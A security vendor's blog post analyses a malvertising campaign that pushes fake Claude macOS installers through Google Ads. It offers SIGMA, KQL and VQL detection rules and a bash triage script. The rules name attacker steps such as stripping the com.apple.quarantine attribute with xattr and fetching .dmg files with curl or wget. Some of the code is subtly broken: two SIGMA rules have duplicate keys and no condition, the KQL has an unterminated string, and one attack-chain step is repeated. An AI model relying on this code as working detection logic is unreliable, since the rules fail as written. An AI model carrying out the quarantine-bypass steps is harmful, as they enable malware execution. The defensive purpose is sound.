Back to Intelligence

Malvertising Campaign Targets macOS via Google Ads for Claude.ai Downloads — Detection and Mitigation

SA
Security Arsenal Team
May 10, 2026
5 min read

A sophisticated malvertising campaign is currently targeting macOS users by weaponizing the popularity of AI tools. Attackers are purchasing Google Ads for keywords such as "Claude mac download" to trick users into downloading malicious software. While the sponsored results list claude.ai as the target, the traffic is redirected to fraudulent sites hosting malicious payloads.

For security practitioners, this represents a high-risk supply-chain-style attack vector leveraging trusted brands (Google and Anthropic) to bypass user skepticism. The payload is macOS malware, potentially leading to credential theft, persistent access, or data exfiltration. Immediate defensive measures are required to block these delivery chains and detect post-exploitation activity on endpoints.

Technical Analysis

  • Affected Platform: macOS (Intel and Apple Silicon).
  • Attack Vector: Malvertising (Search Engine Poisoning) and Social Engineering.
  • Attack Chain:
    1. Lure: User searches for "Claude mac download" on Google.
    2. Initial Access: User clicks a sponsored ad masquerading as the official Anthropic domain.
    3. Redirection: The ad redirects to a malicious landing page often utilizing legitimate-looking content or compromised claude.ai shared chat links to host instructions.
    4. Payload Delivery: User downloads a disk image (.dmg) or archive (.zip) posing as the Claude installer.
    5. Execution: User mounts the image and executes the malicious application.
    6. Execution: User mounts the image and executes the malicious application.
    7. Impact: Installation of macOS malware (e.g., Atomic Stealer or similar info-stealers).
  • Exploitation Status: Active in-the-wild exploitation confirmed via BleepingComputer reporting.

Detection & Response

The following detection logic focuses on the behaviors typical of macOS malware delivery: the downloading of disk images from the web, the bypass of Gatekeeper quarantine attributes, and the execution of ad-hoc signed binaries.

SIGMA Rules

YAML
---
title: Potential macOS Gatekeeper Bypass via Xattr Removal
id: 8d1f9a23-4c2e-4f3a-9b5d-6e7f8a9b0c1d
status: experimental
description: Detects attempts to remove the 'com.apple.quarantine' extended attribute, often used by malware to bypass Gatekeeper execution controls.
references:
 - https://attack.mitre.org/techniques/T1553/001/
author: Security Arsenal
date: 2025/04/09
tags:
 - attack.defense_evasion
 - attack.t1553.001
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith:
      - '/xattr'
    CommandLine|contains:
      - '-d'
      - '-r'
      - '-cr'
    CommandLine|contains:
      - 'com.apple.quarantine'
falsepositives:
  - Legitimate users attempting to run unverified internal tools
level: high
---
title: Suspicious macOS Disk Image Download and Mount
id: 2e4f6b78-9a1d-4e5c-8f3b-1d2e3f4a5b6c
status: experimental
description: Detects the downloading of .dmg files followed by immediate mounting using hdiutil, a common pattern in malvertising campaigns.
references:
 - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2025/04/09
tags:
  - attack.initial_access
  - attack.t1105
logsource:
  category: process_creation
  product: macos
detection:
  selector_download:
    Image|endswith:
      - '/curl'
      - '/wget'
    CommandLine|contains:
      - '.dmg'
  selector_mount:
    Image|endswith:
      - '/hdiutil'
    CommandLine|contains:
      - 'attach'
  condition: selector_download or selector_mount
falsepositives:
  - Legitimate software updates or downloads by admins
level: medium
---
title: Execution of Ad-Hoc Signed Application
id: 7c3d1e45-2b8f-4a9e-8c7d-1e2f3a4b5c6d
status: experimental
description: Detects the execution of applications signed with an ad-hoc signature (no valid developer identity), which is common for unsigned malware payloads.
references:
 - https://attack.mitre.org/techniques/T1059/004/
author: Security Arsenal
date: 2025/04/09
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    CommandLine|contains:
      - 'codesign'
    CommandLine|contains:
      - '--display'
      - '-s'
      - '-' 
    CommandLine|contains:
      - 'ad hoc'
falsepositives:
  - Developers testing unsigned builds locally
level: low

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for suspicious xattr usage indicating Gatekeeper bypass
DeviceProcessEvents
| where Timestamp > ago(7d)
| where OSPlatform contains "macOS"
| where ProcessName has "xattr"
| where ProcessCommandLine has "-d" or ProcessCommandLine has "-r" 
| where ProcessCommandLine has "com.apple.quarantine"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| extend FullPath = tostring(FolderPath) + "\" + tostring(ProcessName)

Velociraptor VQL

VQL — Velociraptor
-- Hunt for recent .dmg files in user Downloads that may be malicious
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs='/Users/*/Downloads/*.dmg')
WHERE Mtime > now() - 7d

-- Hunt for unsigned or ad-hoc signed apps executed recently
SELECT Name, Path, Signed, Hash.Path AS SHA256
FROM process_listing(pslist=pslist())
WHERE Signed =~ "ad hoc" OR Signed =~ "false"
  AND Path =~ "Downloads|/private/var/folders"

Remediation Script (Bash)

Bash / Shell
#!/bin/bash
# Script to identify and remediate potential Mac malware artifacts from the Claude.ai malvertising campaign
# Run with root privileges for best results

echo "[*] Checking for recently modified .dmg files in Downloads..."
find /Users/*/Downloads -name "*.dmg" -mtime -7 -ls 2>/dev/null

echo "[*] Checking for LaunchAgents in user profiles..."
# Look for recently created LaunchAgents (common persistence)
find /Users/*/Library/LaunchAgents -name "*.plist" -mtime -7 -exec ls -la {} \; 2>/dev/null

echo "[*] Checking for unsigned applications running..."
# Note: Killing processes requires caution. Investigate first.
# This section identifies suspicious processes for manual review
ps aux | grep -v grep | grep -i "downloads"

echo "[*] Remediation instructions:"
echo "1. Review the .dmg files listed above. If unknown, delete them."
echo "2. Investigate LaunchAgents. Verify the binary path in the 'ProgramArguments' key."
echo "3. If a malicious plist is found, remove the file and kill the associated process."

Remediation

  1. User Awareness & Blocking: Immediately notify security teams and end-users about the fake "Claude mac download" ads. Advise users to navigate directly to anthropic.com rather than relying on search results for downloads.
  2. Network Filtering: Update Secure Web Gateways (SWG) and DNS filters to block known malicious domains associated with this campaign. Indicators should be extracted from the specific incident IOCs.
  3. Endpoint Hardening: Ensure macOS Gatekeeper is strictly enforced. Verify configuration profiles prevent the execution of unsigned apps from the internet.
  4. Investigation: Use the provided VQL and KQL queries to hunt for evidence of xattr manipulation or recent .dmg executions in your environment within the last 7 days.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

managed-socmdrsecurity-monitoringthreat-detectionsiemmacosmalvertisingsoc-mdr

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action